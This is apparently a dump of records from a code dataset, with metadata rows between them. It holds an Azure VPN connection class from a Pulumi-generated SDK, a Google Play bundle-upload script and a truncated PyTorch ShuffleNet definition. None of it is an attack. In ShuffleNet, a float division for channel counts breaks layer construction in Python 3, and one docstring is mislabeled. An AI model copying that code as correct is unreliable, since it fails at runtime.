:param pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]] ipsec_policies: The IPSec Policies to be considered by this connection.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input['SubResourceArgs'] remote_vpn_site: Id of the connected vpn site.
:param pulumi.Input[int] routing_weight: Routing weight for vpn connection.
:param pulumi.Input[str] shared_key: SharedKey for the vpn connection.
:param pulumi.Input[bool] use_local_azure_ip_address: Use local azure ip to initiate connection.
:param pulumi.Input[bool] use_policy_based_traffic_selectors: Enable policy-based traffic selectors.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']] vpn_connection_protocol_type: Connection protocol used for this connection.
:param pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]] vpn_link_connections: List of all vpn site link connections to the gateway.
"""
pulumi.set(__self__, "gateway_name", gateway_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if connection_bandwidth is not None:
pulumi.set(__self__, "connection_bandwidth", connection_bandwidth)
if connection_name is not None:
pulumi.set(__self__, "connection_name", connection_name)
if dpd_timeout_seconds is not None:
pulumi.set(__self__, "dpd_timeout_seconds", dpd_timeout_seconds)
if enable_bgp is not None:
pulumi.set(__self__, "enable_bgp", enable_bgp)
if enable_internet_security is not None:
pulumi.set(__self__, "enable_internet_security", enable_internet_security)
if enable_rate_limiting is not None:
pulumi.set(__self__, "enable_rate_limiting", enable_rate_limiting)
if id is not None:
pulumi.set(__self__, "id", id)
if ipsec_policies is not None:
pulumi.set(__self__, "ipsec_policies", ipsec_policies)
if name is not None:
pulumi.set(__self__, "name", name)
if remote_vpn_site is not None:
pulumi.set(__self__, "remote_vpn_site", remote_vpn_site)
if routing_weight is not None:
pulumi.set(__self__, "routing_weight", routing_weight)
if shared_key is not None:
pulumi.set(__self__, "shared_key", shared_key)
if use_local_azure_ip_address is not None:
pulumi.set(__self__, "use_local_azure_ip_address", use_local_azure_ip_address)
if use_policy_based_traffic_selectors is not None:
pulumi.set(__self__, "use_policy_based_traffic_selectors", use_policy_based_traffic_selectors)
if vpn_connection_protocol_type is not None:
pulumi.set(__self__, "vpn_connection_protocol_type", vpn_connection_protocol_type)
if vpn_link_connections is not None:
pulumi.set(__self__, "vpn_link_connections", vpn_link_connections)
@property
@pulumi.getter(name="gatewayName")
def gateway_name(self) -> pulumi.Input[str]:
"""
The name of the gateway.
"""
return pulumi.get(self, "gateway_name")
@gateway_name.setter
def gateway_name(self, value: pulumi.Input[str]):
pulumi.set(self, "gateway_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name of the VpnGateway.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="connectionBandwidth")
def connection_bandwidth(self) -> Optional[pulumi.Input[int]]:
"""
Expected bandwidth in MBPS.
"""
return pulumi.get(self, "connection_bandwidth")
@connection_bandwidth.setter
def connection_bandwidth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_bandwidth", value)
@property
@pulumi.getter(name="connectionName")
def connection_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the connection.
"""
return pulumi.get(self, "connection_name")
@connection_name.setter
def connection_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_name", value)
@property
@pulumi.getter(name="dpdTimeoutSeconds")
def dpd_timeout_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The dead peer detection timeout for a vpn connection in seconds.
"""
return pulumi.get(self, "dpd_timeout_seconds")
@dpd_timeout_seconds.setter
def dpd_timeout_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "dpd_timeout_seconds", value)
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> Optional[pulumi.Input[bool]]:
"""
EnableBgp flag.
"""
return pulumi.get(self, "enable_bgp")
@enable_bgp.setter
def enable_bgp(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_bgp", value)
@property
@pulumi.getter(name="enableInternetSecurity")
def enable_internet_security(self) -> Optional[pulumi.Input[bool]]:
"""
Enable internet security.
"""
return pulumi.get(self, "enable_internet_security")
@enable_internet_security.setter
def enable_internet_security(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_internet_security", value)
@property
@pulumi.getter(name="enableRateLimiting")
def enable_rate_limiting(self) -> Optional[pulumi.Input[bool]]:
"""
EnableBgp flag.
"""
return pulumi.get(self, "enable_rate_limiting")
@enable_rate_limiting.setter
def enable_rate_limiting(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_rate_limiting", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="ipsecPolicies")
def ipsec_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]]]:
"""
The IPSec Policies to be considered by this connection.
"""
return pulumi.get(self, "ipsec_policies")
@ipsec_policies.setter
def ipsec_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]]]):
pulumi.set(self, "ipsec_policies", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="remoteVpnSite")
def remote_vpn_site(self) -> Optional[pulumi.Input['SubResourceArgs']]:
"""
Id of the connected vpn site.
"""
return pulumi.get(self, "remote_vpn_site")
@remote_vpn_site.setter
def remote_vpn_site(self, value: Optional[pulumi.Input['SubResourceArgs']]):
pulumi.set(self, "remote_vpn_site", value)
@property
@pulumi.getter(name="routingWeight")
def routing_weight(self) -> Optional[pulumi.Input[int]]:
"""
Routing weight for vpn connection.
"""
return pulumi.get(self, "routing_weight")
@routing_weight.setter
def routing_weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "routing_weight", value)
@property
@pulumi.getter(name="sharedKey")
def shared_key(self) -> Optional[pulumi.Input[str]]:
"""
SharedKey for the vpn connection.
"""
return pulumi.get(self, "shared_key")
@shared_key.setter
def shared_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "shared_key", value)
@property
@pulumi.getter(name="useLocalAzureIpAddress")
def use_local_azure_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Use local azure ip to initiate connection.
"""
return pulumi.get(self, "use_local_azure_ip_address")
@use_local_azure_ip_address.setter
def use_local_azure_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_local_azure_ip_address", value)
@property
@pulumi.getter(name="usePolicyBasedTrafficSelectors")
def use_policy_based_traffic_selectors(self) -> Optional[pulumi.Input[bool]]:
"""
Enable policy-based traffic selectors.
"""
return pulumi.get(self, "use_policy_based_traffic_selectors")
@use_policy_based_traffic_selectors.setter
def use_policy_based_traffic_selectors(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_policy_based_traffic_selectors", value)
@property
@pulumi.getter(name="vpnConnectionProtocolType")
def vpn_connection_protocol_type(self) -> Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]]:
"""
Connection protocol used for this connection.
"""
return pulumi.get(self, "vpn_connection_protocol_type")
@vpn_connection_protocol_type.setter
def vpn_connection_protocol_type(self, value: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]]):
pulumi.set(self, "vpn_connection_protocol_type", value)
@property
@pulumi.getter(name="vpnLinkConnections")
def vpn_link_connections(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]]]:
"""
List of all vpn site link connections to the gateway.
"""
return pulumi.get(self, "vpn_link_connections")
@vpn_link_connections.setter
def vpn_link_connections(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]]]):
pulumi.set(self, "vpn_link_connections", value)
class VpnConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_bandwidth: Optional[pulumi.Input[int]] = None,
connection_name: Optional[pulumi.Input[str]] = None,
dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_internet_security: Optional[pulumi.Input[bool]] = None,
enable_rate_limiting: Optional[pulumi.Input[bool]] = None,
gateway_name: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
remote_vpn_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
routing_weight: Optional[pulumi.Input[int]] = None,
shared_key: Optional[pulumi.Input[str]] = None,
use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
vpn_connection_protocol_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
vpn_link_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnSiteLinkConnectionArgs']]]]] = None,
__props__=None):
"""
VpnConnection Resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] connection_bandwidth: Expected bandwidth in MBPS.
:param pulumi.Input[str] connection_name: The name of the connection.
:param pulumi.Input[int] dpd_timeout_seconds: The dead peer detection timeout for a vpn connection in seconds.
:param pulumi.Input[bool] enable_bgp: EnableBgp flag.
:param pulumi.Input[bool] enable_internet_security: Enable internet security.
:param pulumi.Input[bool] enable_rate_limiting: EnableBgp flag.
:param pulumi.Input[str] gateway_name: The name of the gateway.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]] ipsec_policies: The IPSec Policies to be considered by this connection.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[pulumi.InputType['SubResourceArgs']] remote_vpn_site: Id of the connected vpn site.
:param pulumi.Input[str] resource_group_name: The resource group name of the VpnGateway.
:param pulumi.Input[int] routing_weight: Routing weight for vpn connection.
:param pulumi.Input[str] shared_key: SharedKey for the vpn connection.
:param pulumi.Input[bool] use_local_azure_ip_address: Use local azure ip to initiate connection.
:param pulumi.Input[bool] use_policy_based_traffic_selectors: Enable policy-based traffic selectors.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']] vpn_connection_protocol_type: Connection protocol used for this connection.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnSiteLinkConnectionArgs']]]] vpn_link_connections: List of all vpn site link connections to the gateway.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VpnConnectionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
VpnConnection Resource.
:param str resource_name: The name of the resource.
:param VpnConnectionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VpnConnectionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_bandwidth: Optional[pulumi.Input[int]] = None,
connection_name: Optional[pulumi.Input[str]] = None,
dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_internet_security: Optional[pulumi.Input[bool]] = None,
enable_rate_limiting: Optional[pulumi.Input[bool]] = None,
gateway_name: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['IpsecPolicyArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
remote_vpn_site: Optional[pulumi.Input[pulumi.InputType['SubResourceArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
routing_weight: Optional[pulumi.Input[int]] = None,
shared_key: Optional[pulumi.Input[str]] = None,
use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
vpn_connection_protocol_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
vpn_link_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VpnSiteLinkConnectionArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VpnConnectionArgs.__new__(VpnConnectionArgs)
__props__.__dict__["connection_bandwidth"] = connection_bandwidth
__props__.__dict__["connection_name"] = connection_name
__props__.__dict__["dpd_timeout_seconds"] = dpd_timeout_seconds
__props__.__dict__["enable_bgp"] = enable_bgp
__props__.__dict__["enable_internet_security"] = enable_internet_security
__props__.__dict__["enable_rate_limiting"] = enable_rate_limiting
if gateway_name is None and not opts.urn:
raise TypeError("Missing required property 'gateway_name'")
__props__.__dict__["gateway_name"] = gateway_name
__props__.__dict__["id"] = id
__props__.__dict__["ipsec_policies"] = ipsec_policies
__props__.__dict__["name"] = name
__props__.__dict__["remote_vpn_site"] = remote_vpn_site
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["routing_weight"] = routing_weight
__props__.__dict__["shared_key"] = shared_key
__props__.__dict__["use_local_azure_ip_address"] = use_local_azure_ip_address
__props__.__dict__["use_policy_based_traffic_selectors"] = use_policy_based_traffic_selectors
__props__.__dict__["vpn_connection_protocol_type"] = vpn_connection_protocol_type
__props__.__dict__["vpn_link_connections"] = vpn_link_connections
__props__.__dict__["connection_status"] = None
__props__.__dict__["egress_bytes_transferred"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["ingress_bytes_transferred"] = None
__props__.__dict__["provisioning_state"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200301:VpnConnection"), pulumi.Alias(type_="azure-native:network:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180401:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180401:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180601:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180601:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180701:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180701:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20180801:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20180801:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20181001:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181001:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20181101:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181101:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20181201:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20181201:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190201:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190201:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190401:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190401:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190601:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190601:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190701:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190701:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190801:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190801:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20190901:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20190901:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20191101:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20191201:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200401:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200501:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200501:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200601:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200701:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20200801:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VpnConnection"), pulumi.Alias(type_="azure-native:network/v20201101:VpnConnection"), pulumi.Alias(type_="azure-nextgen:network/v20201101:VpnConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VpnConnection, __self__).__init__(
'azure-native:network/v20200301:VpnConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VpnConnection':
"""
Get an existing VpnConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VpnConnectionArgs.__new__(VpnConnectionArgs)
__props__.__dict__["connection_bandwidth"] = None
__props__.__dict__["connection_status"] = None
__props__.__dict__["dpd_timeout_seconds"] = None
__props__.__dict__["egress_bytes_transferred"] = None
__props__.__dict__["enable_bgp"] = None
__props__.__dict__["enable_internet_security"] = None
__props__.__dict__["enable_rate_limiting"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["ingress_bytes_transferred"] = None
__props__.__dict__["ipsec_policies"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["remote_vpn_site"] = None
__props__.__dict__["routing_weight"] = None
__props__.__dict__["shared_key"] = None
__props__.__dict__["use_local_azure_ip_address"] = None
__props__.__dict__["use_policy_based_traffic_selectors"] = None
__props__.__dict__["vpn_connection_protocol_type"] = None
__props__.__dict__["vpn_link_connections"] = None
return VpnConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="connectionBandwidth")
def connection_bandwidth(self) -> pulumi.Output[Optional[int]]:
"""
Expected bandwidth in MBPS.
"""
return pulumi.get(self, "connection_bandwidth")
@property
@pulumi.getter(name="connectionStatus")
def connection_status(self) -> pulumi.Output[str]:
"""
The connection status.
"""
return pulumi.get(self, "connection_status")
@property
@pulumi.getter(name="dpdTimeoutSeconds")
def dpd_timeout_seconds(self) -> pulumi.Output[Optional[int]]:
"""
The dead peer detection timeout for a vpn connection in seconds.
"""
return pulumi.get(self, "dpd_timeout_seconds")
@property
@pulumi.getter(name="egressBytesTransferred")
def egress_bytes_transferred(self) -> pulumi.Output[float]:
"""
Egress bytes transferred.
"""
return pulumi.get(self, "egress_bytes_transferred")
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> pulumi.Output[Optional[bool]]:
"""
EnableBgp flag.
"""
return pulumi.get(self, "enable_bgp")
@property
@pulumi.getter(name="enableInternetSecurity")
def enable_internet_security(self) -> pulumi.Output[Optional[bool]]:
"""
Enable internet security.
"""
return pulumi.get(self, "enable_internet_security")
@property
@pulumi.getter(name="enableRateLimiting")
def enable_rate_limiting(self) -> pulumi.Output[Optional[bool]]:
"""
EnableBgp flag.
"""
return pulumi.get(self, "enable_rate_limiting")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="ingressBytesTransferred")
def ingress_bytes_transferred(self) -> pulumi.Output[float]:
"""
Ingress bytes transferred.
"""
return pulumi.get(self, "ingress_bytes_transferred")
@property
@pulumi.getter(name="ipsecPolicies")
def ipsec_policies(self) -> pulumi.Output[Optional[Sequence['outputs.IpsecPolicyResponse']]]:
"""
The IPSec Policies to be considered by this connection.
"""
return pulumi.get(self, "ipsec_policies")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the VPN connection resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="remoteVpnSite")
def remote_vpn_site(self) -> pulumi.Output[Optional['outputs.SubResourceResponse']]:
"""
Id of the connected vpn site.
"""
return pulumi.get(self, "remote_vpn_site")
@property
@pulumi.getter(name="routingWeight")
def routing_weight(self) -> pulumi.Output[Optional[int]]:
"""
Routing weight for vpn connection.
"""
return pulumi.get(self, "routing_weight")
@property
@pulumi.getter(name="sharedKey")
def shared_key(self) -> pulumi.Output[Optional[str]]:
"""
SharedKey for the vpn connection.
"""
return pulumi.get(self, "shared_key")
@property
@pulumi.getter(name="useLocalAzureIpAddress")
def use_local_azure_ip_address(self) -> pulumi.Output[Optional[bool]]:
"""
Use local azure ip to initiate connection.
"""
return pulumi.get(self, "use_local_azure_ip_address")
@property
@pulumi.getter(name="usePolicyBasedTrafficSelectors")
def use_policy_based_traffic_selectors(self) -> pulumi.Output[Optional[bool]]:
"""
Enable policy-based traffic selectors.
"""
return pulumi.get(self, "use_policy_based_traffic_selectors")
@property
@pulumi.getter(name="vpnConnectionProtocolType")
def vpn_connection_protocol_type(self) -> pulumi.Output[Optional[str]]:
"""
Connection protocol used for this connection.
"""
return pulumi.get(self, "vpn_connection_protocol_type")
@property
@pulumi.getter(name="vpnLinkConnections")
def vpn_link_connections(self) -> pulumi.Output[Optional[Sequence['outputs.VpnSiteLinkConnectionResponse']]]:
"""
List of all vpn site link connections to the gateway.
"""
return pulumi.get(self, "vpn_link_connections")
| 50.474843
| 3,116
| 0.683384
|
acff6f08ceb3e3d905f50309e9b580fe14e83f6c
| 3,459
|
py
|
Python
|
upload_bundle_to_alpha.py
|
21Buttons/docker-google-play-publisher
|
69b597789b8bbe33cdcb9e56ad5faea1d6422623
|
[
"Apache-2.0"
] | 1
|
2019-02-13T13:55:23.000Z
|
2019-02-13T13:55:23.000Z
|
upload_bundle_to_alpha.py
|
21Buttons/docker-google-play-publisher
|
69b597789b8bbe33cdcb9e56ad5faea1d6422623
|
[
"Apache-2.0"
] | null | null | null |
upload_bundle_to_alpha.py
|
21Buttons/docker-google-play-publisher
|
69b597789b8bbe33cdcb9e56ad5faea1d6422623
|
[
"Apache-2.0"
] | 2
|
2019-02-13T13:55:15.000Z
|
2021-01-05T10:35:29.000Z
|
#!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Uploads an aab to the alpha track."""
import os
from apiclient.discovery import build
import httplib2
from oauth2client import client
from oauth2client.service_account import ServiceAccountCredentials
TRACK = 'alpha' # Can be 'alpha', beta', 'production' or 'rollout'
PACKAGE_NAME = os.environ['PACKAGE_NAME']
SERVICE_ACCOUNT_EMAIL = os.environ['SERVICE_ACCOUNT_EMAIL']
def main():
# Create an httplib2.Http object to handle our HTTP requests and authorize it
# with the Credentials. Note that the first parameter, service_account_name,
# is the Email address created for the Service account. It must be the email
# address associated with the key that was created.
credentials = ServiceAccountCredentials.from_p12_keyfile(
SERVICE_ACCOUNT_EMAIL,
'key.p12',
scopes=['https://www.googleapis.com/auth/androidpublisher'])
http = httplib2.Http()
http = credentials.authorize(http)
service = build('androidpublisher', 'v3', http=http)
# Process flags and read their values.
package_name = PACKAGE_NAME
bundle_file = '/bundle.aab'
mapping_file = '/mapping.txt'
try:
edit_request = service.edits().insert(body={}, packageName=package_name)
result = edit_request.execute()
edit_id = result['id']
bundle_response = service.edits().bundles().upload(
editId=edit_id,
packageName=package_name,
media_body=bundle_file,
media_mime_type='application/octet-stream').execute()
version_code = bundle_response['versionCode']
print('Version code %d has been uploaded' % version_code)
service.edits().deobfuscationfiles().upload(
packageName=package_name,
editId=edit_id,
apkVersionCode=version_code,
deobfuscationFileType='proguard',
media_body=mapping_file,
media_mime_type='application/octet-stream').execute()
print('Mapping for version code %d has been uploaded' % version_code)
track_response = service.edits().tracks().update(
editId=edit_id,
track=TRACK,
packageName=package_name,
body={'releases': [{
'versionCodes': [version_code],
'status': 'completed',
}]}).execute()
print('Track %s is set with releases: %s' % (
track_response['track'], str(track_response['releases'])))
commit_request = service.edits().commit(editId=edit_id, packageName=package_name).execute()
print('Edit "%s" has been committed' % (commit_request['id']))
except client.AccessTokenRefreshError:
print('The credentials have been revoked or expired, please re-run the '
'application to re-authorize')
if __name__ == '__main__':
main()
| 35.659794
| 99
| 0.677653
|
acff6f78266c55bb93f5b12a6306a5647ebb0769
| 3,542
|
py
|
Python
|
models/shufflenet.py
|
joaocneves/dropout_ensemble
|
3b8052fdc362efc9ef220933e7d454439a18540f
|
[
"MIT"
] | 4,983
|
2017-01-29T16:42:35.000Z
|
2022-03-31T20:36:07.000Z
|
models/shufflenet.py
|
joaocneves/dropout_ensemble
|
3b8052fdc362efc9ef220933e7d454439a18540f
|
[
"MIT"
] | 132
|
2017-03-11T09:52:39.000Z
|
2022-03-24T05:15:17.000Z
|
models/shufflenet.py
|
joaocneves/dropout_ensemble
|
3b8052fdc362efc9ef220933e7d454439a18540f
|
[
"MIT"
] | 2,168
|
2017-03-20T06:21:48.000Z
|
2022-03-31T15:01:39.000Z
|
'''ShuffleNet in PyTorch.
See the paper "ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices" for more details.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
class ShuffleBlock(nn.Module):
def __init__(self, groups):
super(ShuffleBlock, self).__init__()
self.groups = groups
def forward(self, x):
'''Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,w] -> [N,C,H,W]'''
N,C,H,W = x.size()
g = self.groups
return x.view(N,g,C//g,H,W).permute(0,2,1,3,4).reshape(N,C,H,W)
class Bottleneck(nn.Module):
def __init__(self, in_planes, out_planes, stride, groups):
super(Bottleneck, self).__init__()
self.stride = stride
mid_planes = out_planes/4
g = 1 if in_planes==24 else groups
self.conv1 = nn.Conv2d(in_planes, mid_planes, kernel_size=1, groups=g, bias=False)
self.bn1 = nn.BatchNorm2d(mid_planes)
self.shuffle1 = ShuffleBlock(groups=g)
self.conv2 = nn.Conv2d(mid_planes, mid_planes, kernel_size=3, stride=stride, padding=1, groups=mid_planes, bias=False)
self.bn2 = nn.BatchNorm2d(mid_planes)
self.conv3 = nn.Conv2d(mid_planes, out_planes, kernel_size=1, groups=groups, bias=False)
self.bn3 = nn.BatchNorm2d(out_planes)
self.shortcut = nn.Sequential()
if stride == 2:
self.shortcut = nn.Sequential(nn.AvgPool2d(3, stride=2, padding=1))
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.shuffle1(out)
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
res = self.shortcut(x)
out = F.relu(torch.cat([out,res], 1)) if self.stride==2 else F.relu(out+res)
return out
class ShuffleNet(nn.Module):
def __init__(self, cfg):
super(ShuffleNet, self).__init__()
out_planes = cfg['out_planes']
num_blocks = cfg['num_blocks']
groups = cfg['groups']
self.conv1 = nn.Conv2d(3, 24, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(24)
self.in_planes = 24
self.layer1 = self._make_layer(out_planes[0], num_blocks[0], groups)
self.layer2 = self._make_layer(out_planes[1], num_blocks[1], groups)
self.layer3 = self._make_layer(out_planes[2], num_blocks[2], groups)
self.linear = nn.Linear(out_planes[2], 10)
def _make_layer(self, out_planes, num_blocks, groups):
layers = []
for i in range(num_blocks):
stride = 2 if i == 0 else 1
cat_planes = self.in_planes if i == 0 else 0
layers.append(Bottleneck(self.in_planes, out_planes-cat_planes, stride=stride, groups=groups))
self.in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ShuffleNetG2():
cfg = {
'out_planes': [200,400,800],
